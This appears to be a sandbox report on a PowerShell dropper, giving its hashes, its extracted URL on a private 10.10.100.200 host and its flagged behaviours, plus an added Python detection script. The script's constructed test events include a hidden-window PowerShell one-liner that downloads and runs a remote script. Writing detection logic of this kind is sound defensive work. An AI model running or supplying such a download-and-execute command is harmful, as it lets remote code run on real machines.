General

  • Target

    a79f7acee5764ff3e3f14bdd8a021cfa393bc53030a8b2b90601a9b0a4f28b59

  • Size

    32KB

  • Sample

    240625-zwhk8awanp

  • MD5

    450a158c29545d79072e8eda82ed7acd

  • SHA1

    c52338065058b5af943b4eb22c49402cdd548f1b

  • SHA256

    a79f7acee5764ff3e3f14bdd8a021cfa393bc53030a8b2b90601a9b0a4f28b59

  • SHA512

    a75d0f9527a6eab60abd2170550660c3189f905d44c886c876e2c4611478e52a21956f29c299544bc43a32f60b83dbc509a41671b3c0d2336be7c8d9d73eb28f

  • SSDEEP

    192:kI24cZEvA+6/6rNavrgYjk+4bWliuVsJ8n7UjkOuqCsLIg0jyI90t7a/RJza:kxyiSwvxjk+tikd7UwqCcIg0jzCtO/

Malware Config

  • Extracted

    Language
    ps1

  • Deobfuscated

  • URLs

    ps1.dropper
    http://10.10.100.200/run64.ps1

Targets

    • Target

      a79f7acee5764ff3e3f14bdd8a021cfa393bc53030a8b2b90601a9b0a4f28b59

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Drops file in System32 directory
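
The three behaviours flagged above, plus the ps1.dropper URL from the extracted config, expressed as detection logic and run over constructed process-creation and file-creation events. This is an added example written for this page, not code from the sandbox or from the sample: the suspicious-parent and System32-writer lists, the Sysmon-style field names and every event line below are assumptions, and the report itself names neither the parent process nor the command line the sample used. One caveat a hunter should keep in mind: 10.10.100.200 is an RFC 1918 address, so the dropper host is a lab or internal staging machine, and the URL is only a meaningful indicator inside the environment that produced this sample.

```python
"""Re-create the report's signatures as checks over endpoint telemetry.

Added example for this page; the event data and allow/deny lists are
constructed assumptions, not values taken from the sandbox report.
"""
import re
from urllib.parse import urlparse

# Indicator taken from the report's extracted malware config (ps1.dropper).
DROPPER_URL = "http://10.10.100.200/run64.ps1"
DROPPER_HOST_RE = re.compile(
    rf"(?<![\d.]){re.escape(urlparse(DROPPER_URL).hostname)}(?![\d.])"
)

# Assumptions for this example; the report does not name any of these.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
SYSTEM32_WRITERS = {"trustedinstaller.exe", "tiworker.exe", "msiexec.exe", "svchost.exe"}
SYSTEM32 = "c:\\windows\\system32\\"

# powershell.exe accepts any unambiguous prefix of -WindowStyle, so "-w hidden",
# "-win hidden" and "-WindowStyle Hidden" all hide the window; match every prefix.
_WS_PREFIXES = "|".join("windowstyle"[:n] for n in range(11, 0, -1))
HIDDEN_WINDOW = re.compile(rf"(?<![\w-])[-/](?:{_WS_PREFIXES})\s+hidden\b", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list[str]:
    """Return the signatures (named as in the report) that one event satisfies."""
    hits: list[str] = []
    image = _basename(ev.get("image", ""))
    if ev["event"] == "ProcessCreate":
        parent = _basename(ev.get("parent_image", ""))
        cmd = ev.get("command_line", "")
        if parent in SUSPICIOUS_PARENTS and image in INTERPRETERS:
            hits.append("Process spawned unexpected child process")
        if image in {"powershell.exe", "pwsh.exe"} and HIDDEN_WINDOW.search(cmd):
            hits.append("Command and Scripting Interpreter: PowerShell (hidden window)")
        if DROPPER_URL.lower() in cmd.lower() or DROPPER_HOST_RE.search(cmd):
            hits.append("Contacts ps1.dropper URL from extracted config")
    elif ev["event"] == "FileCreate":
        target = ev.get("target_filename", "").replace("/", "\\").lower()
        if target.startswith(SYSTEM32) and image not in SYSTEM32_WRITERS:
            hits.append("Drops file in System32 directory")
    return hits


def triage(events: list[dict]) -> dict[int, list[str]]:
    """Map event id -> matched signatures, omitting events with no findings."""
    findings: dict[int, list[str]] = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            findings[ev["id"]] = hits
    return findings


# Constructed telemetry in the shape of Sysmon event 1 (process create) and
# event 11 (file create). The download one-liner and the dropped file name are
# assumptions made for the example; the report supplies only the URL.
SAMPLE_EVENTS = [
    {"id": 1, "event": "ProcessCreate",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://10.10.100.200/run64.ps1')\""},
    {"id": 2, "event": "FileCreate",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_filename": r"C:\Windows\System32\example.dll"},
    {"id": 3, "event": "ProcessCreate",  # user-launched admin script: no finding
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"id": 4, "event": "FileCreate",  # OS servicing writing to System32: allowed
     "image": r"C:\Windows\servicing\TrustedInstaller.exe",
     "target_filename": r"C:\Windows\System32\example.mui"},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

Only events 1 and 2 produce findings; event 1 alone matches three signatures, which is the pattern the 10/10 score reflects: a document-handling parent launching a hidden PowerShell that fetches a second-stage script. The prefix handling in HIDDEN_WINDOW matters in practice, because rules that look only for the literal string "-WindowStyle Hidden" miss the far more common "-w hidden" form.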

MITRE ATT&CK Enterprise v15

Tasks